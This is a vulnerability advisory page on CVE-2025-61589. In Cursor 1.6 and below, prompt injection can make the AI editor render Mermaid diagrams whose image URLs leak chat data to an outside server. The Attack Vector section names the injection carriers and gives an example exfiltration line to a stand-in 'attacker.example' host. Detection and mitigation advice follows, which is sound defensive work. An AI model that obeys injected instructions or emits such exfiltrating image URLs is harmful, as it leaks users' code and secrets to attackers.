Skip to main content
CVE Vulnerability Database
Vulnerability Database/CVE-2025-61589

CVE-2025-61589: Cursor AI Editor Information Disclosure

CVE-2025-61589 is an information disclosure vulnerability in Anysphere Cursor that exploits Mermaid diagram rendering to exfiltrate sensitive data. This article covers technical details, affected versions, and mitigation.

Published:

CVE-2025-61589 Overview

CVE-2025-61589 affects Cursor, an AI-powered code editor developed by Anysphere. The vulnerability exists in versions 1.6 and below, where the Mermaid diagram rendering feature allows embedded images to be fetched and rendered within the chat interface. An attacker who successfully performs a prompt injection can abuse this behavior to exfiltrate sensitive information to an attacker-controlled server through image fetch requests. The issue is classified under [CWE-200] Information Exposure. Anysphere fixed the vulnerability in Cursor version 1.7.

Critical Impact

Successful exploitation enables exfiltration of sensitive chat context, source code, or user data to third-party servers via covert image fetch requests triggered by prompt injection.

Affected Products

  • Anysphere Cursor versions 1.6 and below
  • Cursor chat interface with Mermaid diagram rendering enabled
  • All platforms running vulnerable Cursor builds

Discovery Timeline

  • 2025-10-03 - CVE-2025-61589 published to NVD
  • 2026-06-17 - Last updated in NVD database

Technical Details for CVE-2025-61589

Vulnerability Analysis

Cursor integrates Mermaid, a JavaScript library used to render diagrams from text definitions, directly inside the chat box. Mermaid supports embedding images as part of diagram syntax. Cursor renders these images without restricting the destination host, which causes the client to issue outbound HTTP requests to arbitrary URLs. When an attacker controls the diagram content via prompt injection, they can construct an image URL that encodes sensitive context from the chat session into the request path or query string. The remote server receives this data through standard web access logs. A malicious model, hallucination, or backdoored fine-tune can also trigger the exploit without direct attacker interaction.

Root Cause

The root cause is missing egress restriction on rendered Mermaid content. Cursor treats model-generated diagram markup as safe for rendering and permits arbitrary external image URLs. No allowlist, content security policy, or same-origin restriction blocks outbound fetches. Additional bypasses of the initial patch were identified and tracked under GHSA-43wj-mwcc-x93p.

Attack Vector

Exploitation requires prompt injection delivered through untrusted content the model processes. Attack sources include malicious web pages fetched by the agent, uploaded images with embedded text, or source code files containing hidden instructions. The injected prompt instructs the model to emit a Mermaid diagram containing an image reference such as img: https://attacker.example/log?data=<secrets>. When Cursor renders the diagram, the client issues the fetch and delivers the embedded data to the attacker.

See the GitHub Security Advisory GHSA-xw2x-252g-97w2 and the follow-up GHSA-43wj-mwcc-x93p for technical details.

Detection Methods for CVE-2025-61589

Indicators of Compromise

  • Outbound HTTP or HTTPS requests from Cursor processes to unfamiliar external domains during chat sessions
  • Chat responses containing Mermaid diagrams with img: directives referencing external URLs
  • Long query strings or path segments in outbound image fetches that appear to encode source code or credentials

Detection Strategies

  • Inspect network telemetry from developer endpoints for image fetches initiated by the Cursor client to non-allowlisted hosts
  • Review Cursor chat history for Mermaid blocks containing suspicious image references or base64-encoded parameters
  • Correlate prompt injection sources such as scraped web content or uploaded files with subsequent unusual egress

Monitoring Recommendations

  • Monitor DNS queries from developer workstations for newly registered or low-reputation domains contacted by Cursor
  • Log and alert on Cursor process network activity exceeding baseline volumes during agentic sessions
  • Track Cursor version deployment across the fleet to identify hosts still running versions at or below 1.6

How to Mitigate CVE-2025-61589

Immediate Actions Required

  • Upgrade Cursor to version 1.7 or later on all developer endpoints
  • Audit recent chat sessions and agent runs for evidence of Mermaid-based exfiltration attempts
  • Restrict Cursor egress at the network layer to trusted model and update endpoints where feasible

Patch Information

Anysphere released a fix in Cursor version 1.7 as documented in GHSA-xw2x-252g-97w2. Additional bypasses discovered after the initial fix are addressed in the guidance under GHSA-43wj-mwcc-x93p. Confirm the installed version reports 1.7 or higher before treating the issue as remediated.

Workarounds

  • Disable or avoid rendering Mermaid diagrams in chat until the patched version is deployed
  • Limit exposure of untrusted content such as scraped web pages, third-party source code, or uploaded images to the assistant
  • Apply outbound network egress rules on developer machines to block image fetches to non-allowlisted domains

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.